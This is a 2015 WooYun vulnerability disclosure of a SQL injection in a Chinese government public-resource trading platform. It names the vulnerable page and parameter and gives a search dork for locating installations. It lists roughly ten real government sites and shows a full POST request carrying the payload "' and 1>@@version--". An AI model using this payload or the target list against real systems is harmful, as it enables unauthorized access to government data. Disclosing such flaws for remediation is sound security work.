当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120232

漏洞标题:某政务系统通用SQL注入漏洞,可获取任意数据

相关厂商:杭州建易建设信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-06-16 11:20

修复时间:2015-09-19 07:46

公开时间:2015-09-19 07:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-21: 厂商已经确认,细节仅向厂商公开
2015-06-24: 细节向第三方安全合作伙伴开放
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开

简要描述:

某政务系统通用SQL注入漏洞,可获取任意数据

详细说明:

系统名称:公共资源平台
系统开发厂商:杭州建易建设信息技术有限公司
系统架构:ASPX+MSSQL
漏洞位置:web_news/WebNewsList.aspx?ViewID=255 标题搜索处
注入参数:txtTile
关键字:inurl:ProArticleInfo.aspx?ID=

11.png


部分政府案例:
杭州市富阳区公共资源交易网:
http://218.108.102.39:8091/index.aspx
杭州市公共资源交易网:
http://web.hzctc.cn/index.aspx
临安市公共资源交易网:
http://www.lajyzx.gov.cn/
杭州市上城区公共资源交易网:
http://ggzy.hzsc.gov.cn/Index.aspx
海城市公共资源交易网:
http://www.hcggzy.com/
临安市行政服务中心:
http://laspzx.linan.gov.cn:8080/
余杭区公共资源交易网:
http://218.108.114.98/
富阳市公共资源交易网:
http://218.108.102.39:8091/
余杭区公共资源交易网:
http://115.236.6.65/
临安市公共资源招标系统:
http://laspzx.linan.gov.cn:8080/
等等

漏洞证明:

漏洞验证:
http://www.hzctc.cn/web_news/WebNewsList.aspx?ViewID=255为例:

11.png


POST /web_news/WebNewsList.aspx?ViewID=255 HTTP/1.1
Host: www.hzctc.cn
Proxy-Connection: keep-alive
Content-Length: 2057
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.hzctc.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hzctc.cn/web_news/WebNewsList.aspx?ViewID=255
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 53gid2=41261329206; 53gid0=46578598907; 53gid1=46578598907; CNZZDATA5094733=cnzz_eid%3D869466664-1431144842-http%253A%252F%252F118.174.27.112%252F%26ntime%3D1434127748; ASP.NET_SessionId=52ucim453enibwas5h4pkfzp
__VIEWSTATE=%2FwEPDwUJNjA5NTEwMDQ0D2QWAgIED2QWBAIBDw8WAh4EVGV4dAUz6aaW6aG1ID4g5pS%2F5Yqh5YWs5byAID4g5Lia5Yqh5rWB56iLID4g5bu66K6%2B5bel56iLZGQCBw88KwANAQAPFg4eCkRhdGFNZW1iZXIFBnRhYmxlMR4LUmVjb3JkQ291bnQCBh4GU3FsU3RyBYoDc2VsZWN0IG5ld3NfaWQsbmV3c190aXRsZSxuZXdzX2VudGVydGltZSxzZmZiLHB1Ymxpc2hTdGFydFRpbWUsbmV3c19lbmR0aW1lLChjYXNlIGltcG9ydGFudCB3aGVuIDEgdGhlbiAnaW1wdCcgZWxzZSAnJyBlbmQpIGFzIGltcG9ydGFudCBmcm9tIHdlYl9uZXdzIHdoZXJlIGV4aXN0cyhzZWxlY3QgMSBmcm9tIHdlYl9uZXdzX2NsYXNzIHdoZXJlIG5ld3NfaWQ9d2ViX25ld3MubmV3c19pZCBhbmQgY2xhc3NfdmFsdWU9MjU1KSBhbmQgUHVibGlzaFN0YXJ0VGltZTw9Z2V0ZGF0ZSgpIGFuZCAobmV3c19lbmR0aW1lIGlzIG51bGwgb3IgbmV3c19lbmR0aW1lPj1nZXRkYXRlKCkpIGFuZCBzZmZiPSfmmK8nIG9yZGVyIGJ5IFB1Ymxpc2hTdGFydFRpbWUgZGVzYyAgLENyZWF0ZVRpbWUgZGVzYx4KREJDb25uTmFtZQUETWFpbh4LXyFJdGVtQ291bnQCBh4KUGFnZXNDb3VudAIBHgtfIURhdGFCb3VuZGdkFgJmD2QWEmYPDxYCHgdWaXNpYmxlaGRkAgEPZBYEZg9kFgJmDxUEAzI1NQQ2MDc1ABLpgoDor7fmi5vmoIfmtYHnqItkAgEPDxYCHwAFCjIwMTMtMDMtMDRkZAICD2QWBGYPZBYCZg8VBAMyNTUENjA3NAAe5YuY5a%2Bf6K6%2B6K6h6aG555uu5oub5qCH5rWB56iLZAIBDw8WAh8ABQoyMDEzLTAzLTA0ZGQCAw9kFgRmD2QWAmYPFQQDMjU1BDYwNzMAUeW4guWFrOWFsei1hOa6kOS6pOaYk%2BS4reW%2Fg%2BW3peeoi%2BW7uuiuvuWbveacieaKlei1hOi1hOagvOWQjuWuoeWFrOW8gOaLm%2Bagh%2Ba1geeoi2QCAQ8PFgIfAAUKMjAxMy0wMy0wNGRkAgQPZBYEZg9kFgJmDxUEAzI1NQQ2MDA1ACrmna3lt57luILlu7rorr7lt6XnqIvmi5vmoIflip7lip7kuovmjIfljZdkAgEPDxYCHwAFCjIwMDgtMDQtMjVkZAIFD2QWBGYPZBYCZg8VBAMyNTUENjAwNAAS5YWs5byA5Lqk5piT5rWB56iLZAIBDw8WAh8ABQoyMDA4LTA0LTI1ZGQCBg9kFgRmD2QWAmYPFQQDMjU1BDYwMDMAOeW4guWFrOWFsei1hOa6kOS6pOaYk%2BS4reW%2Fg%2BW3peeoi%2BW7uuiuvuWFrOW8gOaLm%2Bagh%2Ba1geeoi2QCAQ8PFgIfAAUKMjAwOC0wNC0yNWRkAgcPDxYCHwhoZGQCCA8PFgIfCGdkFgJmD2QWAgIMDw9kFgIeCU9uS2V5RG93bgV0amF2YXNjcmlwdDogaWYgKGV2ZW50LmtleUNvZGU9PTEzKSB7ZG9jdW1lbnQuYWxsLkdyaWRWaWV3ZXIxX2N0bDA5X0J0bkdvdG8uZm9jdXMoKTsgZXZlbnQua2V5Q29kZT0xMzsgcmV0dXJuIHRydWU7IH1kGAEFC0dyaWRWaWV3ZXIxDzwrAAoBCAIBZOmLYY%2F65Yj%2BRHCOIEnUJ7AYY0b8&__EVENTVALIDATION=%2FwEWCQL6wOiCCwK8hMiGBgLq5Ji9BgL75eXdBgKb%2B5P9CwLsitWZCwLYr7i4DwKMz9W6DwLRk8596j9VYIxXDQwU0LrI1J9GOMy4d6U%3D&txtTile=a&btnSeach=%E6%9F%A5%E8%AF%A2


' and 1>@@version--

11.png


当前数据库:

11.png


等等
其他如上!

修复方案:

参数过滤化!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-21 07:45

厂商回复:

cnvd确认并复现所述情况,已经转由cncert下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无